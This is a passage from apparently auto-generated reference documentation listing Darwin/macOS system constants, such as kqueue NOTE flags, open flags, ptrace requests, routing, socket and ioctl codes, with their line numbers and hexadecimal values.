0x80000000 constant NOTE_FORK (line 1081) | NOTE_FORK = 0x40000000 constant NOTE_FUNLOCK (line 1082) | NOTE_FUNLOCK = 0x100 constant NOTE_LEEWAY (line 1083) | NOTE_LEEWAY = 0x10 constant NOTE_LINK (line 1084) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1085) | NOTE_LOWAT = 0x1 constant NOTE_MACHTIME (line 1086) | NOTE_MACHTIME = 0x100 constant NOTE_MACH_CONTINUOUS_TIME (line 1087) | NOTE_MACH_CONTINUOUS_TIME = 0x80 constant NOTE_NONE (line 1088) | NOTE_NONE = 0x80 constant NOTE_NSECONDS (line 1089) | NOTE_NSECONDS = 0x4 constant NOTE_OOB (line 1090) | NOTE_OOB = 0x2 constant NOTE_PCTRLMASK (line 1091) | NOTE_PCTRLMASK = -0x100000 constant NOTE_PDATAMASK (line 1092) | NOTE_PDATAMASK = 0xfffff constant NOTE_REAP (line 1093) | NOTE_REAP = 0x10000000 constant NOTE_RENAME (line 1094) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1095) | NOTE_REVOKE = 0x40 constant NOTE_SECONDS (line 1096) | NOTE_SECONDS = 0x1 constant NOTE_SIGNAL (line 1097) | NOTE_SIGNAL = 0x8000000 constant NOTE_TRACK (line 1098) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1099) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1100) | NOTE_TRIGGER = 0x1000000 constant NOTE_USECONDS (line 1101) | NOTE_USECONDS = 0x2 constant NOTE_VM_ERROR (line 1102) | NOTE_VM_ERROR = 0x10000000 constant NOTE_VM_PRESSURE (line 1103) | NOTE_VM_PRESSURE = 0x80000000 constant NOTE_VM_PRESSURE_SUDDEN_TERMINATE (line 1104) | NOTE_VM_PRESSURE_SUDDEN_TERMINATE = 0x20000000 constant NOTE_VM_PRESSURE_TERMINATE (line 1105) | NOTE_VM_PRESSURE_TERMINATE = 0x40000000 constant NOTE_WRITE (line 1106) | NOTE_WRITE = 0x2 constant OCRNL (line 1107) | OCRNL = 0x10 constant OFDEL (line 1108) | OFDEL = 0x20000 constant OFILL (line 1109) | OFILL = 0x80 constant ONLCR (line 1110) | ONLCR = 0x2 constant ONLRET (line 1111) | ONLRET = 0x40 constant ONOCR (line 1112) | ONOCR = 0x20 constant ONOEOT (line 1113) | ONOEOT = 0x8 constant OPOST (line 1114) | OPOST = 0x1 constant OXTABS (line 1115) | OXTABS = 0x4 constant O_ACCMODE (line 1116) | O_ACCMODE = 0x3 constant O_ALERT (line 1117) | O_ALERT = 0x20000000 constant O_APPEND (line 1118) | O_APPEND = 0x8 constant O_ASYNC (line 1119) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1120) | O_CLOEXEC = 0x1000000 constant O_CREAT (line 1121) | O_CREAT = 0x200 constant O_DIRECTORY (line 1122) | O_DIRECTORY = 0x100000 constant O_DP_GETRAWENCRYPTED (line 1123) | O_DP_GETRAWENCRYPTED = 0x1 constant O_DP_GETRAWUNENCRYPTED (line 1124) | O_DP_GETRAWUNENCRYPTED = 0x2 constant O_DSYNC (line 1125) | O_DSYNC = 0x400000 constant O_EVTONLY (line 1126) | O_EVTONLY = 0x8000 constant O_EXCL (line 1127) | O_EXCL = 0x800 constant O_EXLOCK (line 1128) | O_EXLOCK = 0x20 constant O_FSYNC (line 1129) | O_FSYNC = 0x80 constant O_NDELAY (line 1130) | O_NDELAY = 0x4 constant O_NOCTTY (line 1131) | O_NOCTTY = 0x20000 constant O_NOFOLLOW (line 1132) | O_NOFOLLOW = 0x100 constant O_NOFOLLOW_ANY (line 1133) | O_NOFOLLOW_ANY = 0x20000000 constant O_NONBLOCK (line 1134) | O_NONBLOCK = 0x4 constant O_POPUP (line 1135) | O_POPUP = 0x80000000 constant O_RDONLY (line 1136) | O_RDONLY = 0x0 constant O_RDWR (line 1137) | O_RDWR = 0x2 constant O_SHLOCK (line 1138) | O_SHLOCK = 0x10 constant O_SYMLINK (line 1139) | O_SYMLINK = 0x200000 constant O_SYNC (line 1140) | O_SYNC = 0x80 constant O_TRUNC (line 1141) | O_TRUNC = 0x400 constant O_WRONLY (line 1142) | O_WRONLY = 0x1 constant PARENB (line 1143) | PARENB = 0x1000 constant PARMRK (line 1144) | PARMRK = 0x8 constant PARODD (line 1145) | PARODD = 0x2000 constant PENDIN (line 1146) | PENDIN = 0x20000000 constant PRIO_PGRP (line 1147) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1148) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1149) | PRIO_USER = 0x2 constant PROT_EXEC (line 1150) | PROT_EXEC = 0x4 constant PROT_NONE (line 1151) | PROT_NONE = 0x0 constant PROT_READ (line 1152) | PROT_READ = 0x1 constant PROT_WRITE (line 1153) | PROT_WRITE = 0x2 constant PT_ATTACH (line 1154) | PT_ATTACH = 0xa constant PT_ATTACHEXC (line 1155) | PT_ATTACHEXC = 0xe constant PT_CONTINUE (line 1156) | PT_CONTINUE = 0x7 constant PT_DENY_ATTACH (line 1157) | PT_DENY_ATTACH = 0x1f constant PT_DETACH (line 1158) | PT_DETACH = 0xb constant PT_FIRSTMACH (line 1159) | PT_FIRSTMACH = 0x20 constant PT_FORCEQUOTA (line 1160) | PT_FORCEQUOTA = 0x1e constant PT_KILL (line 1161) | PT_KILL = 0x8 constant PT_READ_D (line 1162) | PT_READ_D = 0x2 constant PT_READ_I (line 1163) | PT_READ_I = 0x1 constant PT_READ_U (line 1164) | PT_READ_U = 0x3 constant PT_SIGEXC (line 1165) | PT_SIGEXC = 0xc constant PT_STEP (line 1166) | PT_STEP = 0x9 constant PT_THUPDATE (line 1167) | PT_THUPDATE = 0xd constant PT_TRACE_ME (line 1168) | PT_TRACE_ME = 0x0 constant PT_WRITE_D (line 1169) | PT_WRITE_D = 0x5 constant PT_WRITE_I (line 1170) | PT_WRITE_I = 0x4 constant PT_WRITE_U (line 1171) | PT_WRITE_U = 0x6 constant RLIMIT_AS (line 1172) | RLIMIT_AS = 0x5 constant RLIMIT_CORE (line 1173) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1174) | RLIMIT_CPU = 0x0 constant RLIMIT_CPU_USAGE_MONITOR (line 1175) | RLIMIT_CPU_USAGE_MONITOR = 0x2 constant RLIMIT_DATA (line 1176) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1177) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1178) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1179) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1180) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1181) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1182) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1183) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1184) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1185) | RTAX_BRD = 0x7 constant RTAX_DST (line 1186) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1187) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1188) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1189) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1190) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1191) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 1192) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1193) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1194) | RTA_BRD = 0x80 constant RTA_DST (line 1195) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1196) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1197) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1198) | RTA_IFA = 0x20 constant RTA_IFP (line 1199) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1200) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1201) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1202) | RTF_BROADCAST = 0x400000 constant RTF_CLONING (line 1203) | RTF_CLONING = 0x100 constant RTF_CONDEMNED (line 1204) | RTF_CONDEMNED = 0x2000000 constant RTF_DEAD (line 1205) | RTF_DEAD = 0x20000000 constant RTF_DELCLONE (line 1206) | RTF_DELCLONE = 0x80 constant RTF_DONE (line 1207) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1208) | RTF_DYNAMIC = 0x10 constant RTF_GATEWAY (line 1209) | RTF_GATEWAY = 0x2 constant RTF_GLOBAL (line 1210) | RTF_GLOBAL = 0x40000000 constant RTF_HOST (line 1211) | RTF_HOST = 0x4 constant RTF_IFREF (line 1212) | RTF_IFREF = 0x4000000 constant RTF_IFSCOPE (line 1213) | RTF_IFSCOPE = 0x1000000 constant RTF_LLDATA (line 1214) | RTF_LLDATA = 0x400 constant RTF_LLINFO (line 1215) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1216) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1217) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 1218) | RTF_MULTICAST = 0x800000 constant RTF_NOIFREF (line 1219) | RTF_NOIFREF = 0x2000 constant RTF_PINNED (line 1220) | RTF_PINNED = 0x100000 constant RTF_PRCLONING (line 1221) | RTF_PRCLONING = 0x10000 constant RTF_PROTO1 (line 1222) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1223) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1224) | RTF_PROTO3 = 0x40000 constant RTF_PROXY (line 1225) | RTF_PROXY = 0x8000000 constant RTF_REJECT (line 1226) | RTF_REJECT = 0x8 constant RTF_ROUTER (line 1227) | RTF_ROUTER = 0x10000000 constant RTF_STATIC (line 1228) | RTF_STATIC = 0x800 constant RTF_UP (line 1229) | RTF_UP = 0x1 constant RTF_WASCLONED (line 1230) | RTF_WASCLONED = 0x20000 constant RTF_XRESOLVE (line 1231) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1232) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1233) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1234) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1235) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1236) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1237) | RTM_GET = 0x4 constant RTM_GET2 (line 1238) | RTM_GET2 = 0x14 constant RTM_IFINFO (line 1239) | RTM_IFINFO = 0xe constant RTM_IFINFO2 (line 1240) | RTM_IFINFO2 = 0x12 constant RTM_LOCK (line 1241) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1242) | RTM_LOSING = 0x5 constant RTM_MISS (line 1243) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1244) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1245) | RTM_NEWMADDR = 0xf constant RTM_NEWMADDR2 (line 1246) | RTM_NEWMADDR2 = 0x13 constant RTM_OLDADD (line 1247) | RTM_OLDADD = 0x9 constant RTM_OLDDEL (line 1248) | RTM_OLDDEL = 0xa constant RTM_REDIRECT (line 1249) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1250) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1251) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1252) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1253) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1254) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1255) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1256) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1257) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1258) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1259) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1260) | RTV_SSTHRESH = 0x20 constant RUSAGE_CHILDREN (line 1261) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1262) | RUSAGE_SELF = 0x0 constant SCM_CREDS (line 1263) | SCM_CREDS = 0x3 constant SCM_RIGHTS (line 1264) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1265) | SCM_TIMESTAMP = 0x2 constant SCM_TIMESTAMP_MONOTONIC (line 1266) | SCM_TIMESTAMP_MONOTONIC = 0x4 constant SEEK_CUR (line 1267) | SEEK_CUR = 0x1 constant SEEK_DATA (line 1268) | SEEK_DATA = 0x4 constant SEEK_END (line 1269) | SEEK_END = 0x2 constant SEEK_HOLE (line 1270) | SEEK_HOLE = 0x3 constant SEEK_SET (line 1271) | SEEK_SET = 0x0 constant SF_APPEND (line 1272) | SF_APPEND = 0x40000 constant SF_ARCHIVED (line 1273) | SF_ARCHIVED = 0x10000 constant SF_DATALESS (line 1274) | SF_DATALESS = 0x40000000 constant SF_FIRMLINK (line 1275) | SF_FIRMLINK = 0x800000 constant SF_IMMUTABLE (line 1276) | SF_IMMUTABLE = 0x20000 constant SF_NOUNLINK (line 1277) | SF_NOUNLINK = 0x100000 constant SF_RESTRICTED (line 1278) | SF_RESTRICTED = 0x80000 constant SF_SETTABLE (line 1279) | SF_SETTABLE = 0x3fff0000 constant SF_SUPPORTED (line 1280) | SF_SUPPORTED = 0x9f0000 constant SF_SYNTHETIC (line 1281) | SF_SYNTHETIC = 0xc0000000 constant SHUT_RD (line 1282) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1283) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1284) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1285) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1286) | SIOCAIFADDR = 0x8040691a constant SIOCARPIPLL (line 1287) | SIOCARPIPLL = 0xc0206928 constant SIOCATMARK (line 1288) | SIOCATMARK = 0x40047307 constant SIOCAUTOADDR (line 1289) | SIOCAUTOADDR = 0xc0206926 constant SIOCAUTONETMASK (line 1290) | SIOCAUTONETMASK = 0x80206927 constant SIOCDELMULTI (line 1291) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1292) | SIOCDIFADDR = 0x80206919 constant SIOCDIFPHYADDR (line 1293) | SIOCDIFPHYADDR = 0x80206941 constant SIOCGDRVSPEC (line 1294) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETVLAN (line 1295) | SIOCGETVLAN = 0xc020697f constant SIOCGHIWAT (line 1296) | SIOCGHIWAT = 0x40047301 constant SIOCGIF6LOWPAN (line 1297) | SIOCGIF6LOWPAN = 0xc02069c5 constant SIOCGIFADDR (line 1298) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALTMTU (line 1299) | SIOCGIFALTMTU = 0xc0206948 constant SIOCGIFASYNCMAP (line 1300) | SIOCGIFASYNCMAP = 0xc020697c constant SIOCGIFBOND (line 1301) | SIOCGIFBOND = 0xc0206947 constant SIOCGIFBRDADDR (line 1302) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1303) | SIOCGIFCAP = 0xc020695b constant SIOCGIFCONF (line 1304) | SIOCGIFCONF = 0xc00c6924 constant SIOCGIFDEVMTU (line 1305) | SIOCGIFDEVMTU = 0xc0206944 constant SIOCGIFDSTADDR (line 1306) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFLAGS (line 1307) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFFUNCTIONALTYPE (line 1308) | SIOCGIFFUNCTIONALTYPE = 0xc02069ad constant SIOCGIFGENERIC (line 1309) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFKPI (line 1310) | SIOCGIFKPI = 0xc0206987 constant SIOCGIFMAC (line 1311) | SIOCGIFMAC = 0xc0206982 constant SIOCGIFMEDIA (line 1312) | SIOCGIFMEDIA = 0xc02c6938 constant SIOCGIFMETRIC (line 1313) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1314) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1315) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1316) | SIOCGIFPDSTADDR = 0xc0206940 constant SIOCGIFPHYS (line 1317) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPSRCADDR (line 1318) | SIOCGIFPSRCADDR = 0xc020693f constant SIOCGIFSTATUS (line 1319) | SIOCGIFSTATUS = 0xc331693d constant SIOCGIFVLAN (line 1320) | SIOCGIFVLAN = 0xc020697f constant SIOCGIFWAKEFLAGS (line 1321) | SIOCGIFWAKEFLAGS = 0xc0206988 constant SIOCGIFXMEDIA (line 1322) | SIOCGIFXMEDIA = 0xc02c6948 constant SIOCGLOWAT (line 1323) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1324) | SIOCGPGRP = 0x40047309 constant SIOCIFCREATE (line 1325) | SIOCIFCREATE = 0xc0206978 constant SIOCIFCREATE2 (line 1326) | SIOCIFCREATE2 = 0xc020697a constant SIOCIFDESTROY (line 1327) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1328) | SIOCIFGCLONERS = 0xc0106981 constant SIOCRSLVMULTI (line 1329) | SIOCRSLVMULTI = 0xc010693b constant SIOCSDRVSPEC (line 1330) | SIOCSDRVSPEC = 0x8028697b constant SIOCSETVLAN (line 1331) | SIOCSETVLAN = 0x8020697e constant SIOCSHIWAT (line 1332) | SIOCSHIWAT = 0x80047300 constant SIOCSIF6LOWPAN (line 1333) | SIOCSIF6LOWPAN = 0x802069c4 constant SIOCSIFADDR (line 1334) | SIOCSIFADDR = 0x8020690c constant SIOCSIFALTMTU (line 1335) | SIOCSIFALTMTU = 0x80206945 constant SIOCSIFASYNCMAP (line 1336) | SIOCSIFASYNCMAP = 0x8020697d constant SIOCSIFBOND (line 1337) | SIOCSIFBOND = 0x80206946 constant SIOCSIFBRDADDR (line 1338) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1339) | SIOCSIFCAP = 0x8020695a constant SIOCSIFDSTADDR (line 1340) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFLAGS (line 1341) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1342) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFKPI (line 1343) | SIOCSIFKPI = 0x80206986 constant SIOCSIFLLADDR (line 1344) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMAC (line 1345) | SIOCSIFMAC = 0x80206983 constant SIOCSIFMEDIA (line 1346) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1347) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1348) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNETMASK (line 1349) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1350) | SIOCSIFPHYADDR = 0x8040693e constant SIOCSIFPHYS (line 1351) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFVLAN (line 1352) | SIOCSIFVLAN = 0x8020697e constant SIOCSLOWAT (line 1353) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1354) | SIOCSPGRP = 0x80047308 constant SOCK_DGRAM (line 1355) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1356) | SOCK_MAXADDRLEN = 0xff constant SOCK_RAW (line 1357) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1358) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1359) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1360) | SOCK_STREAM = 0x1 constant SOL_LOCAL (line 1361) | SOL_LOCAL = 0x0 constant SOL_SOCKET (line 1362) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1363) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1364) | SO_ACCEPTCONN = 0x2 constant SO_BROADCAST (line 1365) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1366) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 1367) | SO_DONTROUTE = 0x10 constant SO_DONTTRUNC (line 1368) | SO_DONTTRUNC = 0x2000 constant SO_ERROR (line 1369) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1370) | SO_KEEPALIVE = 0x8 constant SO_LABEL (line 1371) | SO_LABEL = 0x1010 constant SO_LINGER (line 1372) | SO_LINGER = 0x80 constant SO_LINGER_SEC (line 1373) | SO_LINGER_SEC = 0x1080 constant SO_NETSVC_MARKING_LEVEL (line 1374) | SO_NETSVC_MARKING_LEVEL = 0x1119 constant SO_NET_SERVICE_TYPE (line 1375) | SO_NET_SERVICE_TYPE = 0x1116 constant SO_NKE (line 1376) | SO_NKE = 0x1021 constant SO_NOADDRERR (line 1377) | SO_NOADDRERR = 0x1023 constant SO_NOSIGPIPE (line 1378) | SO_NOSIGPIPE = 0x1022 constant SO_NOTIFYCONFLICT (line 1379) | SO_NOTIFYCONFLICT = 0x1026 constant SO_NP_EXTENSIONS (line 1380) | SO_NP_EXTENSIONS = 0x1083 constant SO_NREAD (line 1381) | SO_NREAD = 0x1020 constant SO_NUMRCVPKT (line 1382) | SO_NUMRCVPKT = 0x1112 constant SO_NWRITE (line 1383) | SO_NWRITE = 0x1024 constant SO_OOBINLINE (line 1384) | SO_OOBINLINE = 0x100 constant SO_PEERLABEL (line 1385) | SO_PEERLABEL = 0x1011 constant SO_RANDOMPORT (line 1386) | SO_RANDOMPORT = 0x1082 constant SO_RCVBUF (line 1387) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1388) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1389) | SO_RCVTIMEO = 0x1006 constant SO_REUSEADDR (line 1390) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1391) | SO_REUSEPORT = 0x200 constant SO_REUSESHAREUID (line 1392) | SO_REUSESHAREUID = 0x1025 constant SO_SNDBUF (line 1393) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1394) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1395) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1396) | SO_TIMESTAMP = 0x400 constant SO_TIMESTAMP_MONOTONIC (line 1397) | SO_TIMESTAMP_MONOTONIC = 0x800 constant SO_TRACKER_ATTRIBUTE_FLAGS_APP_APPROVED (line 1398) | SO_TRACKER_ATTRIBUTE_FLAGS_APP_APPROVED = 0x1 constant SO_TRACKER_ATTRIBUTE_FLAGS_DOMAIN_SHORT (line 1399) | SO_TRACKER_ATTRIBUTE_FLAGS_DOMAIN_SHORT = 0x4 constant SO_TRACKER_ATTRIBUTE_FLAGS_TRACKER (line 1400) | SO_TRACKER_ATTRIBUTE_FLAGS_TRACKER = 0x2 constant SO_TRACKER_TRANSPARENCY_VERSION (line 1401) | SO_TRACKER_TRANSPARENCY_VERSION = 0x3 constant SO_TYPE (line 1402) | SO_TYPE = 0x1008 constant SO_UPCALLCLOSEWAIT (line 1403) | SO_UPCALLCLOSEWAIT = 0x1027 constant SO_USELOOPBACK (line 1404) | SO_USELOOPBACK = 0x40 constant SO_WANTMORE (line 1405) | SO_WANTMORE = 0x4000 constant SO_WANTOOBFLAG (line 1406) | SO_WANTOOBFLAG = 0x8000 constant S_IEXEC (line 1407) | S_IEXEC = 0x40 constant S_IFBLK (line 1408) | S_IFBLK = 0x6000 constant S_IFCHR (line 1409) | S_IFCHR = 0x2000 constant S_IFDIR (line 1410) | S_IFDIR = 0x4000 constant S_IFIFO (line 1411) | S_IFIFO = 0x1000 constant S_IFLNK (line 1412) | S_IFLNK = 0xa000 constant S_IFMT (line 1413) | S_IFMT = 0xf000 constant S_IFREG (line 1414) | S_IFREG = 0x8000 constant S_IFSOCK (line 1415) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1416) | S_IFWHT = 0xe000 constant S_IREAD (line 1417) | S_IREAD = 0x100 constant S_IRGRP (line 1418) | S_IRGRP = 0x20 constant S_IROTH (line 1419) | S_IROTH = 0x4 constant S_IRUSR (line 1420) | S_IRUSR = 0x100 constant S_IRWXG (line 1421) | S_IRWXG = 0x38 constant S_IRWXO (line 1422) | S_IRWXO = 0x7 constant S_IRWXU (line 1423) | S_IRWXU = 0x1c0 constant S_ISGID (line 1424) | S_ISGID = 0x400 constant S_ISTXT (line 1425) | S_ISTXT = 0x200 constant S_ISUID (line 1426) | S_ISUID = 0x800 constant S_ISVTX (line 1427) | S_ISVTX = 0x200 constant S_IWGRP (line 1428) | S_IWGRP = 0x10 constant S_IWOTH (line 1429) | S_IWOTH = 0x2 constant S_IWRITE (line 1430) | S_IWRITE = 0x80 constant S_IWUSR (line 1431) | S_IWUSR = 0x80 constant S_IXGRP (line 1432) | S_IXGRP = 0x8 constant S_IXOTH (line 1433) | S_IXOTH = 0x1 constant S_IXUSR (line 1434) | S_IXUSR = 0x40 constant TAB0 (line 1435) | TAB0 = 0x0 constant TAB1 (line 1436) | TAB1 = 0x400 constant TAB2 (line 1437) | TAB2 = 0x800 constant TAB3 (line 1438) | TAB3 = 0x4 constant TABDLY (line 1439) | TABDLY = 0xc04 constant TCIFLUSH (line 1440) | TCIFLUSH = 0x1 constant TCIOFF (line 1441) | TCIOFF = 0x3 constant TCIOFLUSH (line 1442) | TCIOFLUSH = 0x3 constant TCION (line 1443) | TCION = 0x4 constant TCOFLUSH (line 1444) | TCOFLUSH = 0x2 constant TCOOFF (line 1445) | TCOOFF = 0x1 constant TCOON (line 1446) | TCOON = 0x2 constant TCPOPT_CC (line 1447) | TCPOPT_CC = 0xb constant TCPOPT_CCECHO (line 1448) | TCPOPT_CCECHO = 0xd constant TCPOPT_CCNEW (line 1449) | TCPOPT_CCNEW = 0xc constant TCPOPT_EOL (line 1450) | TCPOPT_EOL = 0x0 constant TCPOPT_FASTOPEN (line 1451) | TCPOPT_FASTOPEN = 0x22 constant TCPOPT_MAXSEG (line 1452) | TCPOPT_MAXSEG = 0x2 constant TCPOPT_NOP (line 1453) | TCPOPT_NOP = 0x1 constant TCPOPT_SACK (line 1454) | TCPOPT_SACK = 0x5 constant TCPOPT_SACK_HDR (line 1455) | TCPOPT_SACK_HDR = 0x1010500 constant TCPOPT_SACK_PERMITTED (line 1456) | TCPOPT_SACK_PERMITTED = 0x4 constant TCPOPT_SACK_PERMIT_HDR (line 1457) | TCPOPT_SACK_PERMIT_HDR = 0x1010402 constant TCPOPT_SIGNATURE (line 1458) | TCPOPT_SIGNATURE = 0x13 constant TCPOPT_TIMESTAMP (line 1459) | TCPOPT_TIMESTAMP = 0x8 constant TCPOPT_TSTAMP_HDR (line 1460) | TCPOPT_TSTAMP_HDR = 0x101080a constant TCPOPT_WINDOW (line 1461) | TCPOPT_WINDOW = 0x3 constant TCP_CONNECTIONTIMEOUT (line 1462) | TCP_CONNECTIONTIMEOUT = 0x20 constant TCP_CONNECTION_INFO (line 1463) | TCP_CONNECTION_INFO = 0x106 constant TCP_ENABLE_ECN (line 1464) | TCP_ENABLE_ECN = 0x104 constant TCP_FASTOPEN (line 1465) | TCP_FASTOPEN = 0x105 constant TCP_KEEPALIVE (line 1466) | TCP_KEEPALIVE = 0x10 constant TCP_KEEPCNT (line 1467) | TCP_KEEPCNT = 0x102 constant TCP_KEEPINTVL (line 1468) | TCP_KEEPINTVL = 0x101 constant TCP_MAXHLEN (line 1469) | TCP_MAXHLEN = 0x3c constant TCP_MAXOLEN (line 1470) | TCP_MAXOLEN = 0x28 constant TCP_MAXSEG (line 1471) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1472) | TCP_MAXWIN = 0xffff constant TCP_MAX_SACK (line 1473) | TCP_MAX_SACK = 0x4 constant TCP_MAX_WINSHIFT (line 1474) | TCP_MAX_WINSHIFT = 0xe constant TCP_MINMSS (line 1475) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1476) | TCP_MSS = 0x200 constant TCP_NODELAY (line 1477) | TCP_NODELAY = 0x1 constant TCP_NOOPT (line 1478) | TCP_NOOPT = 0x8 constant TCP_NOPUSH (line 1479) | TCP_NOPUSH = 0x4 constant TCP_NOTSENT_LOWAT (line 1480) | TCP_NOTSENT_LOWAT = 0x201 constant TCP_RXT_CONNDROPTIME (line 1481) | TCP_RXT_CONNDROPTIME = 0x80 constant TCP_RXT_FINDROP (line 1482) | TCP_RXT_FINDROP = 0x100 constant TCP_SENDMOREACKS (line 1483) | TCP_SENDMOREACKS = 0x103 constant TCSAFLUSH (line 1484) | TCSAFLUSH = 0x2 constant TIOCCBRK (line 1485) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1486) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1487) | TIOCCONS = 0x80047462 constant TIOCDCDTIMESTAMP (line 1488) | TIOCDCDTIMESTAMP = 0x40107458 constant TIOCDRAIN (line 1489) | TIOCDRAIN = 0x2000745e constant TIOCDSIMICROCODE (line 1490) | TIOCDSIMICROCODE = 0x20007455 constant TIOCEXCL (line 1491) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1492) | TIOCEXT = 0x80047460 constant TIOCFLUSH (line 1493) | TIOCFLUSH = 0x80047410 constant TIOCGDRAINWAIT (line 1494) | TIOCGDRAINWAIT = 0x40047456 constant TIOCGETA (line 1495) | TIOCGETA = 0x40487413 constant TIOCGETD (line 1496) | TIOCGETD = 0x4004741a constant TIOCGPGRP (line 1497) | TIOCGPGRP = 0x40047477 constant TIOCGWINSZ (line 1498) | TIOCGWINSZ = 0x40087468 constant TIOCIXOFF (line 1499) | TIOCIXOFF = 0x20007480 constant TIOCIXON (line 1500) | TIOCIXON 